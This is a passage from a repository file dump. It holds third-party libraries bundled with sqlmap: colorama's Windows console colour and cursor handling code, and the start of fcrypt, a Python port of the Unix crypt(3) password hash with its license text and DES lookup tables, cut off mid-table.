_FillConsoleOutputAttribute(\n            handle, attribute, length, start, byref(num_written))\n\n    def SetConsoleTitle(title):\n        return _SetConsoleTitleW(title)\n"
  },
  {
    "path": "sqlmap/thirdparty/colorama/winterm.py",
    "content": "# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.\nfrom . import win32\n\n\n# from wincon.h\nclass WinColor(object):\n    BLACK   = 0\n    BLUE    = 1\n    GREEN   = 2\n    CYAN    = 3\n    RED     = 4\n    MAGENTA = 5\n    YELLOW  = 6\n    GREY    = 7\n\n# from wincon.h\nclass WinStyle(object):\n    NORMAL              = 0x00 # dim text, dim background\n    BRIGHT              = 0x08 # bright text, dim background\n    BRIGHT_BACKGROUND   = 0x80 # dim text, bright background\n\nclass WinTerm(object):\n\n    def __init__(self):\n        self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes\n        self.set_attrs(self._default)\n        self._default_fore = self._fore\n        self._default_back = self._back\n        self._default_style = self._style\n        # In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style.\n        # So that LIGHT_EX colors and BRIGHT style do not clobber each other,\n        # we track them separately, since LIGHT_EX is overwritten by Fore/Back\n        # and BRIGHT is overwritten by Style codes.\n        self._light = 0\n\n    def get_attrs(self):\n        return self._fore + self._back * 16 + (self._style | self._light)\n\n    def set_attrs(self, value):\n        self._fore = value & 7\n        self._back = (value >> 4) & 7\n        self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND)\n\n    def reset_all(self, on_stderr=None):\n        self.set_attrs(self._default)\n        self.set_console(attrs=self._default)\n\n    def fore(self, fore=None, light=False, on_stderr=False):\n        if fore is None:\n            fore = self._default_fore\n        self._fore = fore\n        # Emulate LIGHT_EX with BRIGHT Style\n        if light:\n            self._light |= WinStyle.BRIGHT\n        else:\n            self._light &= ~WinStyle.BRIGHT\n        self.set_console(on_stderr=on_stderr)\n\n    def back(self, back=None, light=False, on_stderr=False):\n        if back is None:\n            back = self._default_back\n        self._back = back\n        # Emulate LIGHT_EX with BRIGHT_BACKGROUND Style\n        if light:\n            self._light |= WinStyle.BRIGHT_BACKGROUND\n        else:\n            self._light &= ~WinStyle.BRIGHT_BACKGROUND\n        self.set_console(on_stderr=on_stderr)\n\n    def style(self, style=None, on_stderr=False):\n        if style is None:\n            style = self._default_style\n        self._style = style\n        self.set_console(on_stderr=on_stderr)\n\n    def set_console(self, attrs=None, on_stderr=False):\n        if attrs is None:\n            attrs = self.get_attrs()\n        handle = win32.STDOUT\n        if on_stderr:\n            handle = win32.STDERR\n        win32.SetConsoleTextAttribute(handle, attrs)\n\n    def get_position(self, handle):\n        position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition\n        # Because Windows coordinates are 0-based,\n        # and win32.SetConsoleCursorPosition expects 1-based.\n        position.X += 1\n        position.Y += 1\n        return position\n\n    def set_cursor_position(self, position=None, on_stderr=False):\n        if position is None:\n            # I'm not currently tracking the position, so there is no default.\n            # position = self.get_position()\n            return\n        handle = win32.STDOUT\n        if on_stderr:\n            handle = win32.STDERR\n        win32.SetConsoleCursorPosition(handle, position)\n\n    def cursor_adjust(self, x, y, on_stderr=False):\n        handle = win32.STDOUT\n        if on_stderr:\n            handle = win32.STDERR\n        position = self.get_position(handle)\n        adjusted_position = (position.Y + y, position.X + x)\n        win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False)\n\n    def erase_screen(self, mode=0, on_stderr=False):\n        # 0 should clear from the cursor to the end of the screen.\n        # 1 should clear from the cursor to the beginning of the screen.\n        # 2 should clear the entire screen, and move cursor to (1,1)\n        handle = win32.STDOUT\n        if on_stderr:\n            handle = win32.STDERR\n        csbi = win32.GetConsoleScreenBufferInfo(handle)\n        # get the number of character cells in the current buffer\n        cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y\n        # get number of character cells before current cursor position\n        cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X\n        if mode == 0:\n            from_coord = csbi.dwCursorPosition\n            cells_to_erase = cells_in_screen - cells_before_cursor\n        if mode == 1:\n            from_coord = win32.COORD(0, 0)\n            cells_to_erase = cells_before_cursor\n        elif mode == 2:\n            from_coord = win32.COORD(0, 0)\n            cells_to_erase = cells_in_screen\n        else:\n            return\n        # fill the entire screen with blanks\n        win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)\n        # now set the buffer's attributes accordingly\n        win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)\n        if mode == 2:\n            # put the cursor where needed\n            win32.SetConsoleCursorPosition(handle, (1, 1))\n\n    def erase_line(self, mode=0, on_stderr=False):\n        # 0 should clear from the cursor to the end of the line.\n        # 1 should clear from the cursor to the beginning of the line.\n        # 2 should clear the entire line.\n        handle = win32.STDOUT\n        if on_stderr:\n            handle = win32.STDERR\n        csbi = win32.GetConsoleScreenBufferInfo(handle)\n        if mode == 0:\n            from_coord = csbi.dwCursorPosition\n            cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X\n        if mode == 1:\n            from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)\n            cells_to_erase = csbi.dwCursorPosition.X\n        elif mode == 2:\n            from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)\n            cells_to_erase = csbi.dwSize.X\n        else:\n            return\n        # fill the entire screen with blanks\n        win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)\n        # now set the buffer's attributes accordingly\n        win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)\n\n    def set_title(self, title):\n        win32.SetConsoleTitle(title)\n"
  },
  {
    "path": "sqlmap/thirdparty/fcrypt/__init__.py",
    "content": "#!/usr/bin/env python\n\n#Copyright (c) 2004, Carey Evans <careye@spamcop.net>\n#All rights reserved.\n\n#Redistribution and use in source and binary forms, with or without modification,\n#are permitted provided that the following conditions are met:\n\n#* Redistributions of source code must retain the above copyright notice,\n#this list of conditions and the following disclaimer.\n#* Redistributions in binary form must reproduce the above copyright notice,\n#this list of conditions and the following disclaimer in the documentation\n#and/or other materials provided with the distribution.\n\n#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n#DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR\n#ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n#ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\npass\n"
  },
  {
    "path": "sqlmap/thirdparty/fcrypt/fcrypt.py",
    "content": "# fcrypt.py\n\n\"\"\"Unix crypt(3) password hash algorithm.\n\nThis is a port to Python of the standard Unix password crypt function.\nIt's a single self-contained source file that works with any version\nof Python from version 1.5 or higher.  The code is based on Eric\nYoung's optimised crypt in C.\n\nPython fcrypt is intended for users whose Python installation has not\nhad the crypt module enabled, or whose C library doesn't include the\ncrypt function.  See the documentation for the Python crypt module for\nmore information:\n\n  http://www.python.org/doc/current/lib/module-crypt.html\n\nAn alternative Python crypt module that uses the MD5 algorithm and is\nmore secure than fcrypt is available from michal j wallace at:\n\n  http://www.sabren.net/code/python/crypt/index.php3\n\nThe crypt() function is a one-way hash function, intended to hide a\npassword such that the only way to find out the original password is\nto guess values until you get a match.  If you need to encrypt and\ndecrypt data, this is not the module for you.\n\nThere are at least two packages providing Python cryptography support:\nM2Crypto at <http://www.pobox.org.sg/home/ngps/m2/>, and amkCrypto at\n<http://www.amk.ca/python/code/crypto.html>.\n\nFunctions:\n\n  crypt() -- return hashed password\n\"\"\"\n\n__author__ = 'Carey Evans <careye@spamcop.net>'\n__version__ = '1.3.1'\n__date__ = '21 February 2004'\n__credits__ = '''michal j wallace for inspiring me to write this.\nEric Young for the C code this module was copied from.'''\n\n__all__ = ['crypt']\n\n\n# Copyright (C) 2000, 2001, 2004  Carey Evans  <careye@spamcop.net>\n#\n# Permission to use, copy, modify, and distribute this software and\n# its documentation for any purpose and without fee is hereby granted,\n# provided that the above copyright notice appear in all copies and\n# that both that copyright notice and this permission notice appear in\n# supporting documentation.\n#\n# CAREY EVANS DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,\n# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO\n# EVENT SHALL CAREY EVANS BE LIABLE FOR ANY SPECIAL, INDIRECT OR\n# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF\n# USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR\n# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR\n# PERFORMANCE OF THIS SOFTWARE.\n\n# Based on C code by Eric Young (eay@mincom.oz.au), which has the\n# following copyright.  Especially note condition 3, which imposes\n# extra restrictions on top of the standard Python license used above.\n#\n# The fcrypt.c source is available from:\n#     ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/\n\n# ----- BEGIN fcrypt.c LICENSE -----\n#\n# This library is free for commercial and non-commercial use as long as\n# the following conditions are aheared to.  The following conditions\n# apply to all code found in this distribution, be it the RC4, RSA,\n# lhash, DES, etc., code; not just the SSL code.  The SSL documentation\n# included with this distribution is covered by the same copyright terms\n# except that the holder is Tim Hudson (tjh@mincom.oz.au).\n# \n# Copyright remains Eric Young's, and as such any Copyright notices in\n# the code are not to be removed.\n# If this package is used in a product, Eric Young should be given attribution\n# as the author of the parts of the library used.\n# This can be in the form of a textual message at program startup or\n# in documentation (online or textual) provided with the package.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n# 1. Redistributions of source code must retain the copyright\n#    notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n#    notice, this list of conditions and the following disclaimer in the\n#    documentation and/or other materials provided with the distribution.\n# 3. All advertising materials mentioning features or use of this software\n#    must display the following acknowledgement:\n#    \"This product includes cryptographic software written by\n#     Eric Young (eay@mincom.oz.au)\"\n#    The word 'cryptographic' can be left out if the rouines from the library\n#    being used are not cryptographic related :-).\n# 4. If you include any Windows specific code (or a derivative thereof) from \n#    the apps directory (application code) you must include an acknowledgement:\n#    \"This product includes software written by Tim Hudson (tjh@mincom.oz.au)\"\n# \n# THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\n# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\n# SUCH DAMAGE.\n# \n# The licence and distribution terms for any publically available version or\n# derivative of this code cannot be changed.  i.e. this code cannot simply be\n# copied and put under another distribution licence\n# [including the GNU Public Licence.]\n#\n# ----- END fcrypt.c LICENSE -----\n\n\nimport struct, sys\n\nif sys.version_info >= (3, 0):\n    xrange = range\n\n_ITERATIONS = 16\n\n_SPtrans = (\n    # nibble 0\n    [ 0x00820200, 0x00020000, 0x80800000, 0x80820200,\n      0x00800000, 0x80020200, 0x80020000, 0x80800000,\n      0x80020200, 0x00820200, 0x00820000, 0x80000200,\n      0x80800200, 0x00800000, 0x00000000, 0x80020000,\n      0x00020000, 0x80000000, 0x00800200, 0x00020200,\n      0x80820200, 0x00820000, 0x80000200, 0x00800200,\n      0x80000000, 0x00000200, 0x00020200, 0x80820000,\n      0x00000200, 0x80800200, 0x80820000, 0x00000000,\n      0x00000000, 0x80820200, 0x00800200, 0x80020000,\n      0x00820200, 0x00020000, 0x80000200, 0x00800200,\n      0x80820000, 0x00000200, 0x00020200, 0x80800000,\n      0x80020200, 0x80000000, 0x80800000, 0x00820000,\n      0x80820200, 0x00020200, 0x00820000, 0x80800200,\n      0x00800000, 0x80000200, 0x80020000, 0x00000000,\n      0x00020000, 0x00800000, 0x80800200, 0x00820200,\n      0x80000000, 0x80820000, 0x00000200, 0x80020200 ],\n\n    # nibble 1\n    [ 0x10042004, 0x00000000, 0x00042000, 0x10040000,\n      0x10000004, 0x00002004, 0x10002000, 0x00042000,\n      0x00002000, 0x10040004, 0x00000004, 0x10002000,\n      0x00040004, 0x10042000, 0x10040000, 0x00000004,\n      0x00040000, 0x10002004, 0x10040004, 0x00002000,\n      0x00042004, 0x10000000, 0x00000000, 0x00040004,\n      0x10002004, 0x00042004, 0x10042000, 0x10000004,\n      0x10000000, 0x00040000, 0x00002004, 0x10042004,\n      0x00040004, 0x10042000, 0x10002000, 0x00042004,\n      0x10042004, 0x00040004, 0x10000004, 0x00000000,\n      0x10000000, 0x00002004, 0x00040000, 0x10040004,\n      0x00002000, 0x10000000, 0x00042004, 0x10002004,\n      0x10042000, 0x00002000, 0x00000000, 0x10000004,\n      0x00000004, 0x10042004, 0x00042000, 0x10040000,\n      0x10040004, 0x00040000, 0x00002004, 0x10002000,\n      0x10002004, 0x00000004, 0x10040000, 0x00042000 ],\n\n    # nibble 2\n    [ 0x41000000, 0x01010040, 0x00000040, 0x41000040,\n      0x40010000, 0x01000000, 0x41000040, 0x00010040,\n      0x01000040, 0x00010000, 0x01010000, 0x40000000,\n      0x41010040, 0x40000040, 0x40000000, 0x41010000,\n      0x00000000, 0x40010000, 0x01010040, 0x00000040,\n      0x40000040, 0x41010040, 0x00010000, 0x41000000,\n      0x41010000, 0x01000040, 0x40010040, 0x01010000,\n      0x00010040, 0x00000000, 0x01000000, 0x40010040,\n      0x01010040, 0x00000040, 0x40000000, 0x00010000,\n      0x40000040, 0x40010000, 0x01010000, 0x41000040,\n      0x00000000, 0x01010040, 0x00010040, 0x41010000,\n      0x40010000, 0x01000000, 0x41010040, 0x40000000,\n      0x40010040, 0x41000000, 0x01000000, 0x41010040,\n      0x00010000, 0x01000040, 0x41000040, 0x00010040,\n      0x01000040, 0x00000000, 0x41010000, 0x40000040,\n      0x41000000, 0x40010040, 0x00000040, 0x01010000 ],\n\n    # nibble 3\n    [ 0x00100402, 0x04000400, 0x00000002, 0x04100402,\n      0x00000000, 0x04100000, 0x04000402, 0x00100002,\n      0x04100400, 0x04000002, 0x04000000, 0x00000402,\n      0x04000002, 0x00100402, 0x00100000, 0x04000000,\n      0x04100002, 0x00100400, 0x00000400, 0x00000002,\n      0x00100400, 0x04000402, 0x04100000, 0x00000400,\n      0x00000402, 0x00000000, 0x00100002, 0x04100400,\n      0x04000400, 0x04100002, 0x04100402, 0x00100000,\n      0x04100002, 0x00000402, 0x00100000, 0x04000002,\n      0x00100400, 0x04000400, 0x00000002, 0x04100000,\n      0x04000402, 0x00000000, 0x00000400, 0x00100002,\n      0x00000000, 0x04100002, 0x04100400, 0x00000400,\n      0x04000000, 0x04100402, 0x00100402, 0x00100000,\n      0x04100402, 0x00000002, 0x04000400, 0x00100402,\n      0x00100002, 0x00100400, 0x04100000, 0x04000402,\n      0x00000402, 0x04000000, 0x04000002, 0x04100400 ],\n\n    # nibble 4\n    [ 0x02000000, 0x00004000, 0x00000100, 0x02004108,\n      0x02004008, 0x02000100, 0x00004108, 0x02004000,\n      0x00004000, 0x00000008, 0x02000008, 0x00004100,\n      0x02000108, 0x02004008, 0x02004100, 0x00000000,\n      0x00004100, 0x02000000, 0x00004008, 0x00000108,\n      0x02000100, 0x00004108, 0x00000000, 0x02000008,\n      0x00000008, 0x02000108, 0x02004108, 0x00004008,\n      0x02004000, 0x00000100, 0x00000108, 0x02004100,\n      0x02004100, 0x02000108, 0x00004008, 0x02004000,\n      0x00004000, 0x00000008, 0x02000008, 0x02000100,\n      0x02000000, 0x00004100, 0x02004108, 0x00000000,\n      0x00004108, 0x02000000, 0x00000100, 0x00004008,\n      0x02000108, 0x00000100, 0x00000000, 0x02004108,\n      0x02004008, 0x02004100, 0x00000108, 0x00004000,\n      0x00004100, 0x02004008, 0x02000100, 0x00000108,\n      0x00000008, 0x00004108, 0x02004000, 0x02000008 ],\n\n    # nibble 5\n    [ 0x20000010, 0x00080010, 0x00000000, 0x20080800,\n      0x00080010, 0x00000800, 0x20000810, 0x00080000,\n      0x00000810, 0x20080810, 0x00080800, 0x20000000,\n      0x20000800, 0x20000010, 0x20080000, 0x00080810,\n      0x00080000, 0x20000810, 0x20080010, 0x00000000,\n      0x00000800, 0x00000010, 0x20080800, 0x20080010,\n      0x20080810, 0x20080000, 0x20000000, 0x00000810,\n      0x00000010, 0x00080800, 0x00080810, 0x20000800,\n      0x00000810, 0x20000000, 0x20000800, 0x00080810,\n      0x20080800, 0x00080010, 0x00000000, 0x20000800,\n      0x20000000, 0x00000800, 0x20080010, 0x00080000,\n      0x00080010, 0x20080810, 0x00080800, 0x00000010,\n      0x20080810, 0x00080800, 0x00080000, 0x20000810,\n      0x20000010, 0x20080000, 0x00080810, 0x00000000,\n      0x00000800, 0x20000010, 0x20000810, 0x20080800,\n      0x20080000, 0x00000810, 0x00000010, 0x20080010 ],\n\n    # nibble 6\n    [ 0x00001000, 0x00000080, 0x00400080, 0x00400001,\n      0x00401081, 0x00001001, 0x00001080, 0x00000000,\n      0x00400000, 0x00400081, 0x00000081, 0x00401000,\n      0x00000001, 0x00401080, 0x00401000, 0x00000081,\n      0x00400081, 0x00001000, 0x00001001, 0x00401081,\n      0x00000000, 0x00400080, 0x00400001, 0x00001080,\n      0x00401001, 0x00001081, 0x00401080, 0x00000001,\n      0x00001081, 0x00401001, 0x00000080, 0x00400000,\n      0x00001081, 0x00401000, 0x00401001, 0x00000081,\n      0x00001000, 0x00000080, 0x00400000, 0x00401001,\n      0x00400081, 0x00001081, 0x00001080, 0x00000000,\n      0x00000080, 0x00400001, 0x00000001, 0x00400080,\n      0x00000000, 0x00400081, 0x00400080, 0x00001080,\n      0x00000081, 0x00001000, 0x00401081, 0x00400000,\n      0x00401080, 0x00000001, 0x00001001, 0x00401081,\n      0x00400001, 0x00401080, 0x00401000, 0x00001001 ],\n\n    # nibble 7\n    [ 0x08200020, 0x08208000, 0x00008020, 0x00000000,\n      0x08008000, 0x00200020, 0x08200000, 0x08208020,\n      0x00000020, 0x08000000, 0x00208000, 0x00008020,\n      0x00208020, 0x08008020, 0x08000020, 0x08200000,\n      0x00008000, 0x00208020, 0x00200020, 0x08008000,\n      0x08208020, 0x08000020, 0x00000000, 0x00208000,\n      0x08000000, 0x00200000, 0x08008020, 0x08200020,\n      0x00200000, 0x00008000, 0x08208000, 0x00000020,\n      0x00200000, 0x00008000, 0x08000020, 0x08208020,\n      0x00008020, 0x08000000, 0x00000000, 0x00208000,\n      0x08200020, 0x08008020, 0x08008000, 0x00200020,\n      0x08208000, 0x00000020, 0x00200020, 0x08008000,\n      0x08208020, 0x00200000, 0x08200000, 0x08000020,\n      0x00208000, 0x00008020, 0x08008020, 0x08200000,\n      0x00000020, 0x08208000, 0x00208020, 0x00000000,\n      0x08000000, 0x08200020, 0x00008000, 0x00208020 ] )\n\n_skb = (\n    # for C bits (numbered as per FIPS 46) 1 2 3 4 5 6\n    [ 0x00000000, 0x00000010, 0x20000000, 0x20000010,\n      0x00010000, 0x00010010, 0x20010000, 0x20010010,\n      0x00000800, 0x00000810, 0x20000800, 0x20000810,\n      0x00010800, 0x00010810, 0x20010800, 0x20010810,\n      0x00000020, 0x00000030, 0x20000020, 0x20000030,\n      0x00010020, 0x00010030, 0x20010020, 0x20010030,\n      0x00000820, 0x00000830, 0x20000820, 0x20000830,\n      0x00010820, 0x00010830, 0x20010820, 0x20010830,\n      0x00080000, 0x00080010, 0x20080000, 0x20080010,\n      0x00090000, 0x00090010, 0x20090000, 0x20090010,\n      0x00080800, 0x00080810, 0x20080800, 0x20080810,\n      0x00090800, 0x00090810, 0x20090800, 0x20090810,\n      0x00080020, 0x00080030, 0x20080020, 0x20080030,\n      0x00090020, 0x00090030, 0x20090020, 0x20090030,\n      0x00080820, 0x00080830, 0x20080820, 0x20080830,\n      0x00090820, 0x00090830, 0x20090820, 0x20090830 ],\n\n    # for C bits (numbered as per FIPS 46) 7 8 10 11 12 13\n    [ 0x00000000, 0x02000000, 0x00002000, 0x02002000,\n      0x00200000, 0x02200000, 0x00202000, 0x02202000,\n      0x00000004, 0x02000004, 0x00002004, 0x02002004,\n      0x00200004, 0x02200004, 0x00202004, 0x02202004,\n      0x00000400, 0x02000400, 0x00002400, 0x02002400,\n      0x00200400, 0x02200400, 0x00202400, 0x02202400,\n      0x00000404, 0x02000404, 0x00002404, 0x02002404,\n      0x00200404, 0x02200404, 0x00202404, 0x02202404,\n      0x10000000, 0x12000000, 0x10002000, 0x12002000,\n      0x10200000, 0x12200000, 0x10202000, 0x12202000,\n      0x10000004, 0x12000004, 0x10002004, 0x12002004,\n      0x10200004, 0x12200004, 0x10202004, 0x12202004,\n      0x10000400, 0x12000400, 0x10002400, 0x12002400,\n      0x10200400, 0x12200400, 0x10202400, 0x12202400,\n      0x10000404, 0x12000404, 0x10002404, 0x12002404,\n      0x10200404, 0x12200404, 0x10202404, 0x12202404 ],\n\n    # for C bits (numbered as per FIPS 46) 14 15 16 17 19 20\n    [ 0x00000000, 0x00000001, 0x00040000, 0x00040001,\n      0x01000000, 0x01000001, 0x01040000, 0x01040001,\n      0x00000002, 0x00000003, 0x00040002, 0x00040003,\n      0x01000002, 0x01000003, 0x01040002, 0x01040003,\n      0x00000200, 0x00000201, 0x00040200, 0x00040201,\n      0x01000200, 0x01000201, 0x01040200, 0x01040201,\n      0x00000202, 0x00000203, 0x00040202, 0x00040203,\n      0x01000202, 0x01000203, 0x01040202, 0x01040203,\n      0x08000000, 0x08000001, 0x08040000, 0x08040001,\n      0x09000000, 0x09000001, 0x09040000, 0x09040001,\n      0x08000002, 0x08000003, 0x08040002, 0x08040003,\n      0x09000002, 0x09000003, 0x09040002, 0x09040003,\n      0x08000200, 0x08000201, 0x08040200, 0x08040201,\n      0x09000200, 0x09000201, 0x09040200, 0x09040201,\n      0x08000202, 0x08000203, 0x08040202, 0x08040203,\n      0x09000202, 0x09000203, 0x09040202, 0x09040203 ],\n\n    # for C bits (numbered as per FIPS 46) 21 23 24 26 27 28\n    [ 0x00000000, 0x00100000, 0x00000100, 0x00100100,\n      0x00000008, 0x00100008, 0x00000108, 0x00100108,\n      0x00001000, 0x00101000, 0x00001100, 0x00101100,\n      0x00001008, 0x00101008, 0x00001108, 0x00101108,\n      0x04000000, 0x04100000, 0x04000100, 0x04100100,\n      0x04000008, 0x04100008, 0x04000108, 0x04100108,\n      0x04001000, 0x04101000, 0x04001100, 0x04101100,\n      0x04001008, 0x04101008, 0x04001108, 0x04101108,\n      0x00020000, 0x00120000, 0x00020100, 0x00120100,\n      0x00020008, 0x00120008, 0x00020108, 0x00120108,\n      0x00021000, 0x00121000, 0x00021100, 0x00121100,\n      0x00021008, 0x00121008, 0x00021108, 0x00121108,\n      0x04020000, 0x04120000, 0x04020100, 0x04120100,\n      0x04020008, 0x04120008, 0x04020108, 0x04120108,\n      0x04021000, 0x04121000, 0x04021100, 0x04121100,\n      0x04021008, 0x04121008, 0x04021108, 0x04121108 ],\n\n    # for D bits (numbered as per FIPS 46) 1 2 3 4 5 6\n    [ 0x00000000, 0x10000000, 0x00010000, 0x10010000,\n      0x00000004, 0x10000004, 0x00010004, 0x10010004,\n      0x20000000, 0x30000000, 0x20010000, 0x30010000,\n      0x20000004, 0x30000004, 0x20010004, 0x30010004,\n      0x00100000, 0x10100000, 0x00110000, 0x10110000,\n      0x00100004, 0x10100004, 0x00110004, 0x10110004,\n      0x20100000, 0x30100000, 0x20110000, 0x30110000,\n      0x20100004, 0x30100004, 0x20110004, 0x30110004,\n      0x00001000, 0x10001000, 0x00011000, 0x10011000,\n      0x00001004, 0x10001004, 0x00011004, 0x10011004,\n      0x20001000, 0x30001000, 0x20011000, 0x30011000,\n      0x20001004, 0x30001004, 0x20011004, 0x30011004,\n      0x00101000, 0x10101000, 0x00111000, 0x10111000,\n      0x00101004, 0x10101004, 0x00111004, 0x10111004,\n      0x20101000, 0x30101000, 0x20111000, 0x30111000,\n      0x20101004, 0x30101004, 0x20111004, 0x30111004 ],\n\n    # for D bits (numbered as per FIPS 46) 8 9 11 12 13 14\n    [ 0x00000000, 0x08000000, 0x00000008, 0x08000008,\n      0x00000400, 0x08000400, 0x00000408, 0x08000408,\n      0x00020000, 0x08020000, 0x00020008, 0x08020008,\n      0x00020400, 0x08020400, 0x00020408, 0x08020408,\n      0x00000001, 0x08000001, 0x00000009, 0x08000009,\n      0x00000401, 0x08000401, 0x00000409, 0x08000409,\n      0x00020001, 0x08020001, 0x00020009, 0x08020009,\n      0x00020401, 0x08020401, 0x00020409, 0x08020409,\n      0x02000000, 0x0A000000, 0x02000008, 0x0A000008,\n      0x02000400, 0x0A000400, 0x02000408, 0x0A000408,\n      0x02020000, 0x0A020000, 0x02020008, 0x0A020008,\n      0x02020400, 0x0A020400, 0x02020408, 0x0A020408,\n      0x02000001, 0x0A000001, 0x02000009, 0x0A000009,\n      0x02000401, 0x0A000401, 0x02000409, 0x0A000409,\n      0x02020001, 0x0A020001, 0x02020009, 0x0A020009,\n      0x02020401, 0x0A020401, 0x02020409, 0x0A020409 ],\n\n    # for D bits (numbered as per FIPS 46) 16 17 18 19 20 21\n    [ 0x00000000, 0x00000100, 0x00080000, 0x00080100,\n      0x01000000, 0x01000100, 0x01080000, 0x01080100,\n      0x00000010, 0x00000110, 0x00080010, 0x00080110,\n      0x01000010, 0x01000110, 0x01080010, 0x01080110,\n      0x00200000, 0x00200100, 0x00280000, 0x00280100,\n      0x01200000, 0x01200100, 0x01280000, 0x01280100,\n      0x00200010, 0x00200110, 0x00280010, 0x00280110,\n      0x01200010, 0x01200110, 0x01280010, 0x01280110,\n      0x00000200, 0x00000300, 0x00080200, 0x00080300,\n      0x01000200, 0x01000300, 0x01080200, 0x01080300,\n      0x00000210, 0x00000310, 0x00080210, 0x00080310,\n      0x01000210, 0x01000310, 0x01080210, 0x01080310,\n      0x00200200, 0x00200300, 0x00280200, 0x00280300,\n      0x01200200, 0x01200300, 0x01280200, 0x01280300,\n      0x00200210, 0x00200310, 0x00280210, 0x00280310,\n      0x01200210, 0x01200310, 0x01280210, 0x01280310 ],\n\n    # for D bits (numbered as per FIPS 46) 22 23 24 25 27 28\n    [ 0x00000000, 0x04000000, 0x00040000, 0x04040000,\n      0x00000002, 0x04000002, 0x00040002, 0x04040002,\n      0x00002000, 0x04002000, 0x00042000, 0x04042000,\n      0x00002002, 0x04002002, 0x00042002, 0x04042002,\n      0x00000020, 0x04000020, 0x00040020, 0x04040020,\n      0x00000022, 0x04000022, 0x00040022, 0x04040022,\n      0x00002020, 0x04002020, 0x00042020, 0x04042020,\n      0x00002022, 0x04002022, 0x00042022, 0x04042022,\n      0x00000800, 0x04000800, 0x00040800, 0x04040800,\n      0x00000802, 0x04000802, 0x00040802, 0x04040802,\n      0x00002800, 0x04002800, 0x00042800, 0x04042800,\n      0x00002802, 0x04002802, 0x00042802, 0x04042802,\n      0x00000820, 0x04000820, 0x00040820, 0x04040820,\n      0x00000822, 0x04000822, 0x00040822, 0x04040822,\n      0x00002820, 0x04002820, 0x00042820, 0x04042820,\n      0x00002822, 0x04002822, 0x00042822, 0x04042822 ] )\n\n_shifts2 = (0,0,1,1,1,1,1,1,0,1,1,1,1,1,1,0)\n\n_con_salt = [\n    0xD2,0xD3,0xD4,0xD5,0xD6,0xD7,0xD8,0xD9,\n    0xDA,0xDB,0xDC,0xDD,0xDE,0xDF,0xE0,0xE1,\n    0xE2,0xE3,0xE4,0xE5,0xE6,0xE7,0xE8,0xE9,\n    0xEA,0xEB,0xEC,0xED,0xEE,0xEF,0xF0,0xF1,\n    0xF2,0xF3,0xF4,0xF5,0xF6,0xF7,0xF8,0xF9,\n    0xFA,0xFB,0xFC,0xFD,0xFE,0xFF,0x00,0x01,\n    0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,\n    0x0A,0x0B,0x05,0x06,0x07,0x08,0x09,0x0A,\n    0x0B,0x0C,0x0D,0x0E,0x0F,0x10,0x11,0x12,\n    0x13,0x14,0x15,0x16,0x17,0x18,0x19,0x1A,\n    0x1B,0x1C,0x1D,0x1E,0x1F,0x20,0x21,0x22,\n    0x23,0x24,0x25,0x20,0x21,0x22,0x23,0x24,\n    